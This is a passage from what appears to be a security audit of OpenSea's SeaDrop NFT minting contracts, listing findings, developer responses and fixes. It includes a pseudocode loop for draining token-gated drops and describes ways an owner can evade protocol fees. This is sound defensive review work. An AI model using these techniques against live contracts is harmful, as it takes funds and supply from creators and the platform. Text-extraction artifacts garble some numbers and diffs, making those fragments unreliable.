N1 token you can mint an N2 token and vice versa. Now if an actor already has an N1 or N2 token maybe from another token gated drop or from an allow list mint, they can drain these 2 drops till one of them hits maxTokenSupplyForStage limit. # wallet already holds token from N1 while ( have not reached N1.maxTokenSupplyForStage or N2.maxTokenSupplyForStage): w = newWalletIfMaxMintReached(N1, w, t) # this also transfers t to the new wallet w = newWalletIfMaxMintReached(N2, w, t) # this also transfers t to the new wallet t = seaDrop.mintAllowedTokenHolder(N2, f, w, {N1, [t]}) t = seaDrop.mintAllowedTokenHolder(N1, f, w, {N2, [t]}) This scenario can be extended to more complex systems, but the core logic stays the same. Also, it's good to note that in general maxTotalMintableByWallet for token gated drops and maxMintsPerWallet for public mints are not fully enforceable since actors can either distribute their allowed tokens between multiple wallets to mint to their full potential for the token gated drops. And for public mints, they would just use different wallets. It does add extra gas for them to mint since they can't batch mint. That said these limits are enforceable for the signed and allowed mints (or you could say the enforcing has been moved to some off-chain mechanism) OpenSea: In scenario 1, I think a check against allowing a token to register itself as an allowed token-gated-drop is reasonable. In scenario 2, we could also check against allowing a token to register a second token as an allowed-token-gated- drop if that token's currentSupply < maxSupply and has the first token registered as its own token-gated drop. This has the caveat that a token could implement itself to have a changeable maxSupply, which would bypass these checks... open to other implementation ideas. I think both cases should be documented in the comments Spearbit: Agree with OpenSea regarding a check for a self-allowed token gated drop in scenario 1. For scenario 2 or a more complex variant of it like (can be even more complex than below): // N1, N2: IERC721SeaDrop tokens with token gated drop promotions // Each arrow in the diagram below represents an allowed mint mechanism // A -> B : a person with a t_a token from A can mint a token of B (B can potentially mark t_a as ,! redeemed on mint) M0 -> N1 -> M1 -> M2 -> ... -> Mk -> N2 -> O1 -> O2 -> ... -> Oj -> N1 It would be hard to have an implementation that would check for these kind of behaviors. But we agree that documenting these scenarios in the comments would be great. 12 OpenSea: Added error TokenGatedDropAllowedNftTokenCannotBeDropToken() and added comments for sce- nario no 2. See commit 0a91de9. +5.2.5 ERC721A has mint caps that are not checked by ERC721SeaDrop Severity: Medium Risk Context: ERC721SeaDrop.sol#L137-L145 Description: ERC721SeaDrop inherits from ERC721A which packs balance, numberMinted, numberBurned, and an extra data chunk in 1 storage slot (64 bits per substorage) for every address. This would add an inherent cap of 264 (cid:0) 1 to all these different fields. Currently, there is no check in ERC721A's _mint for quantity nor in ERC721SeaDrop's mintSeaDrop function. Also, if we almost reach the max cap for a balance by an owner and someone else transfers a token to this owner, there would be an overflow for the balance and possibly the number of mints in the _packedAddressData. The overflow could possibly reduce the balance and the numberMinted to a way lower numer and numberBurned to a way higher number Recommendation: We should have an additional check if quantity would exceed the mint cap in mintSeaDrop. OpenSea: We will add checks around ERC721A limits. We have added a restraint that maxSupply cannot be set to greater than 264 (cid:0) 1 so balance nor number minted can exceed this. See the commit 5a98d29. +5.2.6 ERC721SeaDrop owner can choose an address they control as the admin when the constructor is called. Severity: Medium Risk Context: ERC721SeaDrop.sol#L83 Description: The owner/creator can call the contract directly (skip using the UI) and set the administrator as themselves or another address that they can control. Then after they create a PublicDrop or TokenGatedDrop, they can call either updatePublicDropFee or updateTokenGatedDropFee and set the feeBps to • zero • or another number and also call the updateAllowedFeeRecipient to add the same or another address they control as a feeRecipient. This way they can circumvent the protocol fee. Recommendation: Consider implementing the following suggestions • Not list NFT contracts on the marketplace site that have an administrator who is not in an internal allowed list. • Or let each allowed SeaDrop implementation's admin/operator to set the admins for the ERC721SeaDrop contract. Although, this can still be possibly rigged by a custom hand-craftedd contract that pretends to be an ERC721SeaDrop contract. • SeaDrop can have its own set of admins independent of the IERC721SeaDrop tokens. These admins should be able to set the feeRecipients and feeBps on SeaDrop without interacting with the original token. OpenSea: In practice, this particular implementation will be deployed by OpenSea or a trusted Partner. In general, an Administrator is not required of ERC721SeaDrop contracts; OpenSea will ingest events and data, and then selectively decide which mints to surface and fulfill, depending on mint parameters. In other words, more generally, it's up to an individual marketplace to decide which mints they are willing to list and fulfill, and that decision making happens off-chain Spearbit: I guess the listing and fulfillment on the OpenSea side is just about the OpenSea marketplace UI. But for example, other aggregators that listen to events from OpenSea deployed SeaDrops can/could list these 13 ERC721SeaDrop on their marketplace. And obviously, users can still interact with the OpenSea deployed SeaDrops directly. +5.2.7 ERC721SeaDrop's admin would need to set feeBps manually after/before creation of each drop by the owner Severity: Medium Risk Context: ERC721SeaDrop.sol#L180, ERC721SeaDrop.sol#L256 Description: When an owner of a ERC721SeaDrop token creates either a public or a token gated drop by calling updatePublicDrop or updateTokenGatedDrop, the PublicDrop.feeBps/TokenGatedDropStage.feeBps is initially set to 0. So the admin would need to set the feeBps parameter at some point (before or after). Forgetting to set this parameter results in not receiving the protocol fees. Recommendation: There are mutiple ways to mitigate this: 1. The admin monitors the activities on-chain and if it sees a newly created drop, calls either updatePublic- DropFee or updateTokenGatedDropFee (depending on the type of the drop) to set the feeBps. 2. Enforcing that both updatePublicDrop and updatePublicDropFee (or updateTokenGatedDrop and update- TokenGatedDropFee) be called by the owner and the admin before a drop can start. The enforcement can be either on the ERC721SeaDrop side or on the SeaDrop side. Also, there could be a flag set by the admin to waive the protocol fee. +5.2.8 owner can reset feeBps set by admin for token gated drops Severity: Medium Risk Context: ERC721SeaDrop.sol#L233-L245, SeaDrop.sol#L860, SeaDrop.sol#L889-L890 Description: Only the admin can call updateTokenGatedDropFee to update feeBps. However, the owner can call updateTokenGatedDrop(address seaDropImpl, address allowedNftToken, TokenGatedDropStage calldata drop- Stage) twice after that to reset the feeBps to 0 for a drop. 1. Once with dropStage.maxTotalMintableByWallet equal to 0 to wipe out the storage on the SeaDrop side. 2. Then with the same allowedNftToken address and the other desired parameters, which would retrieve the previously wiped out drop stage data (with feeBps equal to 0). NOTE: This type of attack does not apply to updatePublicDrop and updatePublicDropFee pair. Since updatePub- licDrop cannot remove or update the feeBps. Once updatePublicDropFee is called with a specific feeBps that value remains for this ERC721SeaDrop contract-related storage on SeaDrop (_publicDrops[msg.sender] = pub- licDrop). And any number of consecutive calls to updatePublicDrop with any parameters cannot change the already set feeBps. Recommendation: The admins could monitor all the activities for updateTokenGatedDrop calls even when the same old allowedNftToken is used and make sure to set the fees after each call if it is not a removal kind. OpenSea: We can re-work it so that updateTokenGatedDropFee "initializes" a tokenGatedDrop stage (all params 0 besides feeBps and restrictFeeRecipients), and a partner is free to then edit other params and delete the stage, but not create a new one. I believe that would be a workaround for current issues. Proposed workaround: Administrator/OpenSea is the only authorized user that can "initialize" a TokenGatedDrop. Initializing a token-gated drop sets all params to zero except maxTotalMintableByWallet = 1 (struct will not be stored if == 0), feeBps, and restrictFeeRecipients = true. The parameter startTime = 0 means the stage will not be active, and cannot be made active by OpenSea. The Owner/Partner can then update the initialized TokenGatedDrop stage (potentially including delete, if so de- sired, but it would need to be re-initialized with a fee by OpenSea). 14 5.3 Low Risk +5.3.1 Update the start token id for ERC721SeaDrop to 1 Severity: Low Risk Context: ERC721SeaDrop.sol#L144 Description: ERC721SeaDrop's mintSeaDrop uses _mint from ERC721A library which starts the token ids for minting from 0. /// contracts/ERC721A.sol#L154-L156 /** * @dev Returns the starting token ID. * To change the starting token ID, please override this function. */ function _startTokenId() internal view virtual returns (uint256) { return 0; } Recommendation: Usually 0 is used to signal values that have not been set or have been removed, ... . To avoid possible future problems consider using a different starting token id by overriding the _startTokenId in ERC721SeaDrop. OpenSea: We can configure it to start at 1 as a QOL improvement. Fixed in commit e14fa17. Spearbit: Acknowledged. +5.3.2 Update the ERC721A library due to an unpadded toString() function Severity: Low Risk Context: ERC721SeaDrop.sol#L14, chiru-labs/ERC721A/contracts/ERC721A.sol#L1049 Description: The audit repo uses ERC721A at dca00fffdc8978ef517fa2bb6a5a776b544c002a which does not add a trailing zero padding to the returned string. Some projects have had issues reusing the toString() where the off-chain call returned some dirty-bits at the end (similar to Seaport 1.0's name()). Recommendation: Consider upgrading to a version of ERC721A1 with that fix, even then testing it would be great. Ref: PR: Add trailing zeros padding to _toString OpenSea: Fixed in commit 8441e94. Spearbit: Acknowledged. +5.3.3 Warn contracts implementing IERC721SeaDrop to revert on quantity == 0 case Severity: Low Risk Context: SeaDrop.sol#L620 Description: There are no checks in Seadrop that prevents minting for the case when quantity == 0. This would call the function mintSeadrop(minter, quantity) for a contract implementing IERC721SeaDrop with quantity == 0. It is up to the implementing contract to revert in such cases. The ERC721A library reverts when quantity == 0--the correct behaviour. However, there has been instances in the past where ignoring quantity == 0 checks have led to security issues. Recommendation: There are two ways to fix this: 1. Seadrop reverts early when quantity == 0. This is never a valid input. As a reference, Seaport avoids any transfers of 0 amount. See TokenTransferrerErrors.sol#L18. 15 2. Warn contracts implementing IERC721SeaDrop to revert on quantity == 0 case. OpenSea: We have added error MintQuantityCannotBeZero to _checkMintQuantity in the commit 69f2854. Spearbit: Acknowledged. +5.3.4 Missing parameter in _SIGNED_MINT_TYPEHASH Severity: Low Risk Context: SeaDrop.sol#L78, lib/SeaDropStructs.sol#L92 Description: A parameter is missing (uint256 maxTokenSupplyForStage) and got caught after reformatting. Recommendation: Reformat these lines into: bytes32 internal immutable _SIGNED_MINT_TYPEHASH = keccak256( "SignedMint(" "address nftContract," "address minter," "address feeRecipient," "MintParams mintParams" ")" "MintParams(" "uint256 mintPrice," "uint256 maxTotalMintableByWallet," "uint256 startTime," "uint256 endTime," "uint256 dropStageIndex," "uint256 maxTokenSupplyForStage," // <--- missing in the audit repo "uint256 feeBps," "bool restrictFeeRecipients" ")" ); bytes32 internal immutable _EIP_712_DOMAIN_TYPEHASH = keccak256( "EIP712Domain(" "string name," "string version," "uint256 chainId," "address verifyingContract" ")" ); +5.3.5 Missing address(0) check Severity: Low Risk SeaDrop.sol#L856, SeaDrop.sol#L907-L909, SeaDrop.sol#L927-L929, SeaDrop.sol#L966-L968, Context: ERC721SeaDrop.sol#L245 Description: All update functions having an address as an argument check them against address(0). This is missing in updateTokenGatedDrop. This is also not protected in ERC721SeaDrop.sol#updateTokenGatedDrop(), so address(0) could pass as a valid value. Recommendation: Consider adding address(0) checks for allowedNftToken OpenSea: Fixed in commit 13deff0. Spearbit: Acknowledged. 16 +5.3.6 Missing boundary checks on feeBps Severity: Low Risk Context: • ERC721SeaDrop.sol#L167, • ERC721SeaDrop.sol#L192, • ERC721SeaDrop.sol#L241, • ERC721SeaDrop.sol#L272, • SeaDrop.sol#L554-L557 Description: There's a missing check when setting feeBps from ERC721SeaDrop.sol while one exists when the value is used at a later stage in Seadrop.sol, which could cause a InvalidFeeBps error. Recommendation: Consider adding the following checks before setting feeBps at the mentioned places in ERC721SeaDrop.sol: // Revert if the fee basis points is greater than 10_000. if (feeBps > 10_000) { revert InvalidFeeBps(feeBps); } OpenSea: This have added this to SeaDrop itself on updatePublicDrop and updateTokenGatedDrop. See commit 246e1d4. Spearbit: Acknowledged. +5.3.7 Upgrade openzeppelin/contracts's version Severity: Low Risk Context: SeaDrop.sol#L318 Description: There are known vulnerabilities in the current @openzeppelin/contracts version used. This affects SeaDrop.sol with a potential Improper Verification of Cryptographic Signature vulnerability as ECDSA.recover is used. Recommendation: Consider upgrading to @openzeppelin/contracts@4.7.3 OpenSea: Fixed in commit d279548. Spearbit: Acknowledged. +5.3.8 struct TokenGatedDropStage is expected to fit into 1 storage slot Severity: Low Risk Context: SeaDropStructs.sol#L32-L61, SeaDrop.sol#L871-L876 Description: struct TokenGatedDropStage is expected to be tightly packed into 1 storage slot, as per announced in its @notice tag. However, the struct actually takes 2 slots. This is unexpected, as only one slot is loaded in the dropStageExists assembly check. Recommendation: Consider changing maxTokenSupplyForStage to uint32 to fit into 1 slot: 17 struct TokenGatedDropStage { uint80 mintPrice; // 80/256 bits uint16 maxTotalMintableByWallet; uint48 startTime; uint48 endTime; uint8 dropStageIndex; // non-zero uint40 maxTokenSupplyForStage; uint32 maxTokenSupplyForStage; uint16 feeBps; bool restrictFeeRecipients; - + } 5.4 Gas Optimization +5.4.1 Avoid expensive iterations on removal of list elements by providing the index of element to be removed Severity: Gas Optimization Context: SeaDrop.sol#L1004 Description: Iterating through an array (address[] storage enumeration) to find the desired element (address toRemove) can be an expensive operation. Instead, it would be best to also provide the index to be removed along with the other parameters to avoid looping over all elements. Also note in the case of _removeFromEnumeration(signer, enumeratedStorage), hopefully, there wouldn't be too many signers corresponding to a contract. So practically, this wouldn't be an issue. But something to note. Although the owner or admin can stuff the signer list with a lot of signers as the other person would not be able to remove from the list (DoS attack). For example, if the owner has stuffed the signer list with malicious signers, the admin would not be able to remove them. Recommendation: One way to simplify the removal process would be by providing the index. As an example: function _removeFromEnumeration( address toRemove, address[] storage enumeration, uint index ) internal { require(enumeration[index] == toRemove); // Do the actual removing--no loops needed. The index needs to be computed off-chain before sending the transaction. +5.4.2 mintParams.allowedNftToken should be cached Severity: Gas Optimization Context: SeaDrop.sol#L345-L436 Description: mintParams.allowedNftToken is accessed several times in the mintAllowedTokenHolder function. It would be cheaper to cache it: // Put the allowedNftToken on the stack for more efficient access. address allowedNftToken = mintParams.allowedNftToken; Recommendation: Consider the following diff: + + + // Put the allowedNftToken on the stack for more efficient access. address allowedNftToken = mintParams.allowedNftToken; // Set the dropStage to a variable. 18 TokenGatedDropStage memory dropStage = _tokenGatedDrops[nftContract][ mintParams.allowedNftToken allowedNftToken - + ... ]; // Check that the sender is the owner of the allowedNftTokenId. if ( IERC721(mintParams.allowedNftToken).ownerOf(tokenId) != minter IERC721(allowedNftToken).ownerOf(tokenId) != minter ) { revert TokenGatedNotTokenOwner( nftContract, mintParams.allowedNftToken, allowedNftToken, tokenId ); } // Check that the token id has not already been redeemed. if ( _tokenGatedRedeemed[nftContract][mintParams.allowedNftToken][ _tokenGatedRedeemed[nftContract][allowedNftToken][ tokenId ] == true ) { revert TokenGatedTokenIdAlreadyRedeemed( nftContract, mintParams.allowedNftToken, allowedNftToken, tokenId ); } // Mark the token id as redeemed. _tokenGatedRedeemed[nftContract][mintParams.allowedNftToken][ _tokenGatedRedeemed[nftContract][allowedNftToken][ - + - + - + - + - + OpenSea: Added in commit 48823a3. Spearbit: Acknowledged. +5.4.3 Immutables which are calculated using keccak256 of a string literal can be made constant. Severity: Informational Context: SeaDrop.sol#L76, SeaDrop.sol#L80 Description: Since Solidity 0.6.12, keccak256 expressions are evaluated at compile-time: Code Generator: Evaluate keccak256 of string literals at compile-time. The suggestion of marking these expressions as immutable to save gas isn't true for compiler versions >= 0.6.12. As a reminder, before that, the occurrences of constant keccak256 expressions were replaced by the expressions instead of the computed values, which added a computation cost. Recommendation: In SeaDrop, _SIGNED_MINT_TYPEHASH and _EIP_712_DOMAIN_TYPEHASH are defined as im- mutable but can be safely tuned into constant. OpenSea: Will update to a constant. 19 +5.4.4 Combine a pair of mapping to a list and mapping to a mapping into mapping to a linked-list Severity: Gas Optimization Context: SeaDrop.sol#L54-L68 Description: SeaDrop uses 3 pairs of mapping to a list and mapping to a mapping that can be combined into just one mapping. The pairs: 1. _allowedFeeRecipients and _enumeratedFeeRecipients 2. _signers and _enumeratedSigners 3. _tokenGatedDrops and _enumeratedTokenGatedTokens Here we have variables that come in pairs. One variable is used for data retrievals (a flag or a custom struct) and the other for iteration/enumeration. mapping(address => mapping(address => CustomStructOrBool)) private variable; mapping(address => address[]) private _enumeratedVariable; Recommendation: We can combine each pair into just one variable that maps address for nftContracts into a (cyclic) doubly-linked list. Then retrievals, insertions, and removals would cost O(1), iteration would remain O(n). Removals is reduced from O(n) to O(1) (this would save us gas on any call that would trigger _removeFromEnu- meration). Also the storage structure would look more simplified. For example for the case of bool inner value (_allowedFeeRecipients, _signers), we can define the doubly-linked list node/element as the following struct: struct Node { bool value; address prev; address next; } And our mapped variable would be: mapping(address => mapping(address => Node)) private variable; We can have the address 0x1 as our flagged address (start/end) of our doubly-linked list. Related: Combine _allowedSeaDrop and _enumeratedAllowedSeaDrop in ERC721SeaDrop to save storage and gas.. +5.4.5 The onlyAllowedSeaDrop modifier is redundant Severity: Gas Optimization Context: • ERC721SeaDrop.sol#L65-L74, • ERC721SeaDrop.sol#L157, • ERC721SeaDrop.sol#L184, • ERC721SeaDrop.sol#L213, • ERC721SeaDrop.sol#L232, • ERC721SeaDrop.sol#L265, • ERC721SeaDrop.sol#L290, • ERC721SeaDrop.sol#L306, • ERC721SeaDrop.sol#L324, 20 • ERC721SeaDrop.sol#L346 Description: The onlyAllowedSeaDrop modifier is always used next to another one (onlyOwner, onlyAdminis- trator or onlyOwnerOrAdministrator). As the owner, which is the least privileged role, already has the privilege to update the allowed SeaDrop registry list for this contract (by calling updateAllowedSeaDrop), this makes this second modifier redundant. Recommendation: Remove the onlyAllowedSeaDrop modifier. As additional note, keep in mind that the only- SeaDrop modifier is indeed useful. It is used on a function where checking against the stored allowed Sea Drop registry list for this contract is relevant. Without the onlySeaDrop modifier, anyone could call the mintSeaDrop endpoint to mint. It restricts calls to only an allowed msg.sender. +5.4.6 Combine _allowedSeaDrop and _enumeratedAllowedSeaDrop in ERC721SeaDrop to save storage and gas. Severity: Gas Optimization Context: ERC721SeaDrop.sol#L48-L52 Description: Combine _allowedSeaDrop and _enumeratedAllowedSeaDrop into just one variable using a cyclic linked-list data structure. This would reduce storage space and save gas when storing or retrieving parameters. Recommendation: An example of structures that could be used instead: mapping(address => address) private _allowedSeaDrops; When creating a cyclic linked-list use a flagged address so that later you will be able to iterate through the list. Let's say you have been given a list of allowed SeaDrop addresses a, then set _allowedSeaDrops[0x01] = a[0]. This would allow you to iterate later on by fetching the data for 0x01 first. Also the last address would need to point to 0x01. Now if _allowedSeaDrops[x] != 0 it is an allowed SeaDrop address (except 0x01). Here are how some of the functions would look like after implementing this type of data structure (rough sketch): // ADDRESS_ZERO = address(uint160(0)) // ADDRESS_ONE = address(uint160(1)) modifier onlySeaDrop() { if (_allowedSeaDrop[msg.sender] == ADDRESS_ZERO || seaDrop == ADDRESS_ONE) { revert OnlySeaDrop(); } _; } modifier onlyAllowedSeaDrop(address seaDrop) { if (_allowedSeaDrop[seaDrop] == ADDRESS_ZERO || seaDrop == ADDRESS_ONE ) { revert OnlySeaDrop(); } _; } function updateAllowedSeaDrop(address[] calldata allowedSeaDrop) external override onlyOwnerOrAdministrator { // Reset the old mapping. address seaDrop = _allowedSeaDrop[ADDRESS_ONE]; while ( seaDrop ) { address nextSeaDrop = _allowedSeaDrop[seaDrop]; delete _allowedSeaDrop[seaDrop]; seaDrop = nextSeaDrop; } 21 seaDrop = ADDRESS_ONE; uint i; uint256 allowedSeaDropLength = allowedSeaDrop.length; // Set the new mapping for allowed SeaDrop contracts. for(; i < allowedSeaDropLength;) { address nextSeaDrop = allowedSeaDrop[i] _allowedSeaDrop[seaDrop] = nextSeaDrop; seaDrop = nextSeaDrop; unchecked { ++i; } } if( allowedSeaDropLength ) { _allowedSeaDrop[seaDrop] = ADDRESS_ONE; } // Emit an event for the update. emit AllowedSeaDropUpdated(allowedSeaDrop); } Also, the constructor would need to be updated accordingly. Use the above implementation of updateAllowed- SeaDrop as a reference. +5.4.7 Use dropStageDoesNotExist instead of dropStageExists Severity: Gas Optimization Context: SeaDrop.sol#L871-L886 Recommendation: Instead of using dropStageExists, we can change that to dropStageDoesNotExist which would save us 2 NOTs, 1 EQ and 1 PUSH1 0. Modified piece: bool dropStageDoesNotExist; assembly { dropStageDoesNotExist:= iszero(sload(existingDropStageData.slot)) } if (addOrUpdateDropStage) { _tokenGatedDrops[msg.sender][allowedNftToken] = dropStage; // Add to enumeration if it does not exist already. if (dropStageDoesNotExist) { enumeratedTokens.push(allowedNftToken); } } else { // Check we are not deleting a drop stage that does not exist. if (dropStageDoesNotExist) { revert TokenGatedDropStageNotPresent(); } // Clear storage slot and remove from enumeration. Amount of gas saved: 22 src/SeaDrop.sol:SeaDrop contract Function Name min avg median max # calls - + updateTokenGatedDrop updateTokenGatedDrop 7087 7087 72743 72741 93461 93458 97461 97458 25 25 OpenSea: Updated in commit ac34900. +5.4.8 .length should not be looked up in every loop of a for-loop Severity: Gas Optimization Context: ERC721SeaDrop.sol#L87, ERC721SeaDrop.sol#L109, ERC721SeaDrop.sol#L117 Description: Reading an array's length at each iteration of a loop consumes more gas than necessary. Recommendation: Consider caching the array's length in a variable before the for-loop, and use this new variable instead. This should save around 3 gas per iteration. OpenSea: Fixed in the commit 0b90c9e. Spearbit: Acknowledged. +5.4.9 A storage pointer should be cached instead of computed multiple times Severity: Gas Optimization Context: SeaDrop.sol#L405-L407, SeaDrop.sol#L417-L419 Description: Caching a mapping's value in a local storage variable when the value is accessed multiple times saves gas due to not having to perform the same offset calculation every time. Recommendation: _tokenGatedRedeemed[nftContract][mintParams.allowedNftToken];: declaring Consider mapping(uint256 => bool) storage redeemedTokenIds = File: SeaDrop.sol // Check that the token id has not already been redeemed. mapping(uint256 => bool) storage redeemedTokenIds = _tokenGatedRedeemed[nftContract][mintParams.allowedNftToken]; if ( ) { _tokenGatedRedeemed[nftContract][mintParams.allowedNftToken][ tokenId ] == true redeemedTokenIds[tokenId] == true revert TokenGatedTokenIdAlreadyRedeemed( nftContract, mintParams.allowedNftToken, tokenId ); } // Mark the token id as redeemed. _tokenGatedRedeemed[nftContract][mintParams.allowedNftToken][ tokenId ] = true; redeemedTokenIds[tokenId] = true; + ,! - - - + - - - + 23 Amount of gas saved: OpenSea: Fixed in commit 3febba4. Spearbit: Acknowledged. +5.4.10 Comparing a boolean to a constant Severity: Gas Optimization Context: SeaDrop.sol#L407, SeaDrop.sol#L469-L470 Description: Comparing to a constant (true or false) is a bit more expensive than directly checking the returned boolean value. Recommendation: Consider applying the following: if ( _tokenGatedRedeemed[nftContract][mintParams.allowedNftToken][ - + ... - + - + tokenId ] == true ] ) { if (restrictFeeRecipients == true) if (restrictFeeRecipients) if (_allowedFeeRecipients[nftContract][feeRecipient] == false) { if (!_allowedFeeRecipients[nftContract][feeRecipient]) { OpenSea: This was fixed in previous commits in the branch, found one more instance in the commit 16a4837. 5.5 Informational +5.5.1 mintAllowList, mintSigned, or mintAllowedTokenHolder have an inherent cap for minting Severity: Informational Context: SeaDropStructs.sol#L58 Description: mintAllowedTokenHolder is stored in a uint40 (after this audit uint32) which limits the maximum token id that can be minted using mintAllowList, mintSigned, or mintAllowedTokenHolder. Recommendation: It would be best to warn the the owner that mintAllowList, mintSigned, or mintAllowedTo- kenHolder cannot mint tokens with tokenID more than 240 (cid:0) 1. Basically, the early drop mints are limited to this range since maxTokenSupplyForStage is not uint256. OpenSea: mintSigned and mintAllowList have maxTokenSupplyForStage as uint256 since they are not stored on chain, but this is true for mintAllowedTokenHolder where the struct is stored on chain. Notes added in commit 0c05761. Spearbit: Acknowledged. 24 +5.5.2 Add warning for NFT contracts to implement authentication properly for updateAllowList Severity: Informational Context: SeaDrop.sol#L827 Recommendation: Need to warn NFT contracts to implement authentication properly for allowed list mints. OpenSea: Implemented in commit 77ca81f. Spearbit: Acknowledged. +5.5.3 Consider replacing minterIfNotPayer parameter to always correspond to the minter Severity: Informational Context: SeaDrop.sol#L145 Description: Currently, the variable minterIfNotPayer is treated in the following way: if the value is 0, then msg.sender would be considered as the minter. Otherwise, minterIfNotPayer would be considered as the minter. The logic can be simplified to always treat this variable as the minter. The 0 can be replaced by setting msg.sender as minterIfNotPayer. The variable should then be renamed as well--we recommend calling it minter afterwards. Recommendation: If the change is implemented, make sure that the backend code is appropriately changed. Supplying the wrong calldata may lead to reverts or loss of funds. OpenSea: The idea here was to cut down on calldata costs in the case where msg.sender is the minter, which would be most normal use-cases. Zero-value calldata should save ~200 gas in the average case, even with branching, right? Spearbit: The gas savings sound accurate. However, we should try to simplify the code. +5.5.4 The interface IERC721ContractMetadata does not extend IERC721 interface Severity: Informational Context: IERC721ContractMetadata.sol#L4 Description: The current interface IERC721ContractMetadata does not include the ERC-721 functions. As a comparision, OpenZeppelin's IERC721Metadata.sol extends the IERC721 interface. Recommendation: Inherit from the IERC721 interface. OpenSea: This should extend IERC721. +5.5.5 Add unit tests for mintSigned and mintAllowList in SeaDrop Severity: Informational Context: SeaDrop.sol#L259 Description: The only test for the mintSigned and the mintAllowList functions are fuzz tests. Recommendation: It would be great to include some basic unit tests for these functions. OpenSea: We are working on full unit-test coverage in Hardhat! Unit tests with complete contract code coverage have been added. SeaDrop-mintSigned.spec.ts, SeaDrop-mintAllowList.spec.ts Spearbit: Acknowledged. 25 +5.5.6 Rename a variable with a misleading name Severity: Informational Context: SeaDrop.sol#L1002-L1008 Description: enumeratedDropsLength variable name in SeaDrop._removeFromEnumeration is a bit misleading since _removeFromEnumeration is used also for signer lists, feeRecipient lists, etc.. Recommendation: Rename enumeratedDropsLength to enumerationLength. OpenSea: Fixed in commit b970ed4. Spearbit: Acknowledged. +5.5.7 The protocol rounds the fees in the favour of creatorPaymentAddress Severity: Informational Context: SeaDrop.sol#L576 Description: The feeAmount calculation rounds down, i.e., rounds in the favour of creatorPaymentAddress and against feeRecipient. For a minuscule amount of ETH (price such that price * feeBps < 10000), the fees received by the feeRecipient would be 0. An interesting case here would be if the value quantity * price * feeBps is greater than or equal to 10000 and price * feeBps < 10000. In this case, the user can split the mint transaction into multiple transactions to skip the fees. However, this is unlikely to be profitable, considering the gas overhead involved as well as the minuscule amount of savings. Recommendation: There are no recommended actions needed here, except documenting that fees are rounded in favour of the creator. OpenSea: Fixed in commit d2a9f29. Spearbit: Acknowledged. +5.5.8 Consider using type(uint).max as the magic value for maxTokenSupplyForStage instead of 0 Severity: Informational Context: SeaDrop.sol#L516 Description: The value 0 is currently used as magic value to mean that maxTokenSupplyForStage to mean that the check quantity + currentTotalSupply > maxTokenSupplyForStage. However, the value type(uint).max is a more appropriate magic value in this case. This also avoids the need for additional branching if (maxTo- kenSupplyForStage != MAGIC_VALUE) as the condition quantity + currentTotalSupply > type(uint).max is never true. Recommendation: Consider implementing the following suggestions 1. Use type(uint).max instead of 0. 2. Remove the redundant if (maxTokenSupplyForStage != MAGIC_VALUE). 3. If the magic value is kept as 0, consider making it a named constant, and using the name everywhere. OpenSea: Fixed in commits d4101c2 and cbd5ce5. Spearbit: Acknowledged. 26 +5.5.9 Missing edge case tests on uninitialized AllowList Severity: Informational Context: SeaDrop.sol#L226-L231 Description: The default value for _allowListMerkleRoots[nftContract] is 0. A transaction that tries to mint an NFT in this case with an empty proof (or any other proof) should revert. There were no tests for this case. Recommendation: Add missing tests. OpenSea: Test added in commit 66ee1176. Spearbit: Acknowledged. +5.5.10 Consider naming state variables as public to replace the user-defined getters Severity: Informational Context: SeaDrop.sol#L43 Description: Several state variables, for example, mapping(address => PublicDrop) private _publicDrops; but have corresponding getters defined (function getPublicDrop(address have private visibility, nftContract)). Replacing private by public and renaming the variable name can decrease the code. There are several examples of the above pattern in the codebase, however we are only listing one here for brevity. Recommendation: For all user defined getter functions, consider replacing the function by marking the visibility of the corresponding state variable to public. To keep the same name of the getter / ABI, the state variable can be renamed, e.g., from _publicDrops to getPublicDrop. OpenSea: "Won't fix" as this doesn't seem to play well with the interfaces we've defined. Spearbit: Acknowledged. +5.5.11 Use bytes.concat instead of abi.encodePacked for concatenation Severity: Informational Context: SeaDrop.sol#L297-L312 Description: While one of the uses of abi.encodePacked is to perform concatenation, the Solidity language does contain a reserved function for this: bytes.concat. Recommendation: Consider using bytes.concat instead of abi.encodePacked for concatenation: - + bytes32 digest = keccak256( abi.encodePacked( bytes.concat( // EIP-191: `0x19` as set prefix, `0x01` as version byte bytes2(0x1901), _domainSeparator(), keccak256( abi.encode( _SIGNED_MINT_TYPEHASH, nftContract, minter, feeRecipient, mintParams ) ) ) ); 27 OpenSea: Updated in commit 47c50ed. Spearbit: Acknowledged. +5.5.12 Misleading comment Severity: Informational Context: SeaDrop.sol#L392-L395 Description: The comment says // Check that the sender is the owner of the allowedNftTokenId.. However, minter isn't necessarily the sender due to how it's set: address minter = minterIfNotPayer != address(0) ? minterIfNotPayer : msg.sender;. Recommendation: Consider editing the comment as such: - + // Check that the sender is the owner of the allowedNftTokenId. // Check that the minter is the owner of the allowedNftTokenId. if ( IERC721(mintParams.allowedNftToken).ownerOf(tokenId) != minter ) { OpenSea: Fixed in commit 1bf3225. Spearbit: Acknowledged. +5.5.13 Use i instead of j as an index name for a non-nested for-loop Severity: Informational Context: SeaDrop.sol#L388 Description: Using an index named j instead of i is confusing, as this naming convention makes developers expect that the for-loop is nested, but this is not the case. Using i is more standard and less surprising. Recommendation: Use i instead of j as an index name OpenSea: Fixed in commit 318c851. Spearbit: Acknowledged. +5.5.14 Avoid duplicating code for consistency Severity: Informational Context: SeaDrop.sol#L129-L136, SeaDrop.sol#L196, SeaDrop.sol#L268, SeaDrop.sol#L362 Description: The _checkActive function is used in every mint function besides mintPublic where the code is almost the same. Recommendation: type(uint64).max): Consider maintaining consistency by using _checkActive(publicDrop.startTime, function mintPublic( ... // Ensure that the drop has started. if (block.timestamp < publicDrop.startTime) { revert NotActive( block.timestamp, publicDrop.startTime, type(uint64).max ); } _checkActive(publicDrop.startTime, type(uint64).max) - - - - - - - + 28 This would also save some deployment cost and some gas on average: OpenSea: Fixed in commit 7f1456d. Spearbit: Acknowledged. +5.5.15 restrictFeeRecipients is always true for either PublicDrop or TokenGatedDrop in ERC721SeaDrop Severity: Informational Context: • ERC721SeaDrop.sol#L168, • ERC721SeaDrop.sol#L193, • ERC721SeaDrop.sol#L242, • ERC721SeaDrop.sol#L273 Description: restrictFeeRecipients is always true for either PublicDrops or TokenGatedDrops. When either one of these drops gets created/updated by calling one of the four functions below on a ERC721SeaDrop contract, its value is hardcoded as true: • updatePublicDrop • updatePublicDropFee • updateTokenGatedDrop • updateTokenGatedDropFee Recommendation: Unless there is a plan to add some functionality for cases when restrictFeeRecipients == false, it would be best to rewrite the contracts to remove this variable and assume it's always true. On the SeaDrop end, there are scenarios where minting with a signature or proof for allowed mints can have 